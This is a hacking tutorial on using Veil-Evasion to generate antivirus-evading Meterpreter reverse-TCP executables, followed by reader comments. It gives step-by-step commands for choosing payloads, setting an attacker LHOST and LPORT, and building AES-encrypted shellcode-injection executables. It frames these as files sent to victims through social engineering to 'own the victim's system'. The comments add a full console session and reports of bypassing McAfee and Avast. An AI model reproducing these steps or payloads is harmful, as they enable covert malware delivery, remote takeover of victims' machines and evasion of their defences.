Hack Like a Pro: How to Evade AV Detection with Veil-Evasion

How to Evade AV Detection with Veil-Evasion

Hack Like a Pro: How to Evade AV Detection with Veil-Evasion

Welcome back, my greenhorn hackers!

One of the most important issues any hacker must address is how to get past security devices and remain undetected. These can include antivirus software, intrusion detection systems, firewalls, web application firewalls, and numerous others. As nearly all of these devices employ a signature-based detection scheme where they maintain a database of known exploits and payload signatures, the key is to either:

  1. create your own exploit, or
  2. change the signature of a known exploit or payload.

As creating your own exploit and payload is both time-consuming and requires advanced skills, the novice hacker is better served by first attempting to change the signature of the exploit and payload.

In previous tutorials, we have used both Metasploit's msfpayload/msencode (now deprecated) and msfvenom. In these cases, the AV developers have coded a signature for the templates these schemes use. In this tutorial, we will look at another re-encoding scheme for hiding the signature of known payloads known as Veil-Evasion.

Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

Step 1: Install Veil-Evasion

We first need to install Veil-Evasion on our system. We can download it from the Kali repository. Simply type:

kali > apt-get install veil-evasion

Step 2: Set Up Veil-Evasion

To start Veil-Evasion, just type:

kali > veil-evasion

When you do so, you will be greeted with this opening screen:

Veil will now begin its installation. It will ask you whether you want to install dependencies; tell it "y" for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select "Install for all users" and click the "Next" button.

Use the default directory when the install wizard asks, and then you will be greeted by a screen like below. Click "Next."

Eventually, you will come to a screen like that below. Go ahead and click "Next" again.

Continue to click "Next" through several screens until you finally come to a window with the "Finish" button. Click it. Eventually, your patience will be rewarded when you finally arrive at the screen below. Now we are ready to begin to use Veil-Evasion to create a nearly undetectable payload.

Step 3: Create an EXE with a Payload

In this first step, we will create a simple .exe file that will contain a payload that enables us to own the victim's system. This could be used to send to the victim and having them click on it to execute it. Generally, this type of attack will be part of a social engineering attack.

Let's now type "list" as this will list all of the payloads that Veil-Evasion can work with.

Those of you who are familiar with Metasploit will recognize many of these payloads.

Step 4: Use a Payload

In this case, let's use the ruby/meterpreter/rev_tcp, or number 44. Let's type:

> use 44

When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.

We will need to set LHOST and LPORT.

> set LHOST 192.168.1.101
> set LPORT 6996

Of course, use the appropriate IP address and port for your circumstances.

Next, we need to tell Veil-Evasion to generate the executable.

> generate

As you can see in the screenshot above, Veil-Evasion has generated an new .exe file that I have named "newpayload.exe" (you can name it whatever you please).

Step 5: Generate an Encrypted Payload to Evade Detection

Next, let's attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we will use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt. This payload type uses VirtualAlloc injection, which creates a executable area in memory for the shellcode and then locks that memory area in physical memory.

This is number 32 on our payload list, so type:

> info 32

It then returns info on this payload as seen below.

This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.

Next, let's tell Veil-Evasion we want to use this payload.

> use 32

Here we have the option to change the default options if we care to do so. For now, let's leave the default options as they are.

Next, let's tell Veil-Evasion we want to generate this encrypted payload.

> generate

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT. When we finish entering the appropriate information for our payload, it will begin to generate the shellcode. This can take few minutes, so be patient.

Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple "veilpayload."

Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.

This new code with the meterpreter embedded within will get past most AV software and security devices. Like anything else, the AV developers will likely find a way to detect even this payload, so be creative and try other payload obfuscation methods in Veil-Evasion until you find one that hides your payload.

Evading security software and devices is among the most important tasks of the hacker, and Veil-Evasion is another tool in our arsenal. Keep in mind, though, that there is NEVER a single, final solution. The hacker must be persistent and creative in finding ways past these devices, so if one method fails, try another, then try another, until you find one that works.

49 Comments

I've had plenty of trouble installing Veil in the past. Plenty of times dependency trees fail because of some Capstone version issues and other times even after install Veil-Evasion.py won't run because of issues. So stressful lol

this may be a bit off-topic, but i was wondering if it was possible to make a meterpreter payload using veil evasion that can be used in metasploit modules as custom payloads. if so, how? (i never used veil evasion before)

even more off-topic: would it also be possible to make an encrypted tunnel to your meterpreter shell so an IDS can't detect it? (like cryptcat does)

-Phoenix750

Phoenix:

That is exactly what we did here in this tutorial. We created a custom payload for Metasploit. Am I missing something in your question?

OTW

master OTW, what you did was create an EXE with an encrypted meterpreter payload in it. my question is how to use this payload in metasploit modules, or can you just simply use the EXE file as a payload? (yeah i am kind of new to using encrypted payloads).

then my second question was that, using my logic thinking, our communications could still be detected by an IDS, so to solve this we would need to encrypt our connection (like Cryptcat does). the thing is, is this possible with meterpreter? i tried to google around but found nothing of interest.

sorry if i was unclear.

-Phoenix750

Phoenix:

I am planning on a new tutorial next week on how add a custom payload to Metasploit.

OTW

Is it even possible to use Veil's hiding technique on other exploits? The social-engineering type EXE makes sense because it disguises the program from antivirus and is useful for disguising a program that the user needs to run, but for more active exploits is it even possible to use Veil's method?

Also, the default mode for meterpreter is encrypted communication back to the attacker.

didn't even know that! thanks master OTW!

-Phoenix750

Note that this encryption only applies to the meterpreter, not other payloads necessarily.

Where do I know wich port I have to use?

Why does the Veil Dev team say not to use the apt-get install version, whereas they prefer cloning?

It's updated more frequently...? I don't know for sure, but the GitHub repo will be updated almost daily.

This was a clean install and apt-get update worked. Where on the Kali site does it show you the current main repositories?

http://docs.kali.org/general-use/kali-linux-sources-list-repositories
"Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

Source repositories

deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Bleeding Edge repositories

deb http://repo.kali.org/kali kali-bleeding-edge main
#deb-src http://repo.kali.org/kali kali-bleeding-edge main"

I pulled it from there.

Did you add the repositories and try again?

Yeah, it works now, thanks. So the standard repository links change when updated over time?

I don't know, it shouldn't too often.

How can i make my payload a .exe? As far as i see i cant change the extension to a windows executeable, and I´m quite certain that that not many windows target machines have python installed. Otherwise I´ll have to use catapult right?

-Kradox

Kra Dox, If I'm not too late and you have already figured this out Veil-Evasion already outputs as an exe file with the default directory of /usr/share/veil-output/compiled

-TheVillain

Hello Sir,

Need help again resolving this problem. I've ran the aes python encryption along with 20 iterations of shikata ga nai and converted it to exe. However, when I run the exe on my PC, it misses my current user folder. As you can see its searching for the dll in NVDPI_~1, however my real user folder is nvdpi_000 and I presume that's the reason why it cant load the dll.This is a windows 8 machine. Any tips how to solve this? Thank you for your time!

Image via imgur.com

It's detected now! :( Another way ?

Is there any way to use Veil with Android payloads? For example, android/meterpreter/reversetcp
Now also mobiles have an AV application!

I did everything. Managed to get through facebook AV and Avast. Executed the file on my virtual machine and... nothing happened ! I guess I got the LHOST wrong. I'm using Windows 7 in VirtualBox. I use a bridged network. The LHOST I've put was the "inet addr" I got after typing ifconfig in Linux.

What could be wrong ?

have you set the payloads LHOST=PublicIP (can google public ip) and the listner as your LHOST=Private/LocalIP (such as ifconfig)

Just a quick question please:

Will I be able to install an ecrypted payload in Metasploit as a custom module? I see that it uses Python when I believe all payloads in metasploit use Ruby right?

Hi OTW,

When trying to create a payload with veil evasion i get these errors:

Images via postimg.org

Any help will be greatly appreciated.

I appears that your pyinstaller is missing or corrupted.

Try removing it and re-installing it.

I can't remove it. It says it is owned by the OS.

sudo apt-get install python.exe

That should do the trick.

have installed veil on kali linux. when i try to use it I face this error in its working process:

! ERROR: Can't find python.exe in /root/.wine/drivec/Python27/
! ERROR: Make sure the python.exe binary exists before using PyInstaller.
please help me resolve this problem.

how do i upload the image...please

When you click on reply, you will see a small icon in the reply window that looks like a picture frame with "attach" next to it.

i have taking the screenshot using scrot

Can any of this payloads be used in a android phone?? i want to evade my own antivirus system to try this out in my android phone.

can you please help me in getting this problem solved
# veil-Evasion
# list
# use python/shellcodeinject/aesencrypt
python/shellcode_inject/aes_encrypt>>: set USE_PYHERION Y
python/shellcode_inject/aes_encrypt>>:help
python/shellcode_inject/aes_encrypt>>: generate

? Use msfvenom or supply custom shellcode?

1 - msfvenom (default)
2 - custom shellcode string
3 - file with shellcode (raw)

> Please enter the number of your choice: 1

* Press enter for windows/meterpreter/reverse_tcp
* Press tab to list available payloads
> Please enter metasploit payload:

> Enter value for 'LHOST', tab for local IP: 192.168.0.6
> Enter value for 'LPORT': 4444
> Enter any extra msfvenom options (syntax: OPTION1=value1 OPTION2=value2):
* Generating shellcode...

> Please enter the base name for output files (default is 'payload'): tutorial

1 - Pyinstaller (default)
2 - Pwnstaller (obfuscated Pyinstaller loader)
3 - Py2Exe

> Please enter the number of your choice:1

! ERROR: Can't find python.exe in /root/.wine/drive_c/Python27/
! ERROR: Make sure the python.exe binary exists before using PyInstaller.

root@kali:~#
this is the problem . can you please help to solve this problem
i have installed python in my kali linux. but python.exe is not
exist. can you please help how to solve this problem. please.

Uhh...
Is it possible to encrypt an encrpted exe again using another method ?
If yes will that payload be able to connect to lhost

Hey for some reason using the first payload that was not encrypted gets past my mcafee antivirus but the encrypted payload does not.

Don't know if you people will still reply me but, i have a really big problem ,when i was installing the veil-evasion with "apt-get install veil-evasion" it succeed but i rebooted my virtual machine right after that, and then there comes a real problem i can't boot literally i don't know if it's memory problem or something else please reply to me ASAP, i tried setting my base memory to higher value but it haven't fixed the problem please HELP!

Share Your Thoughts

  • Hot
  • Latest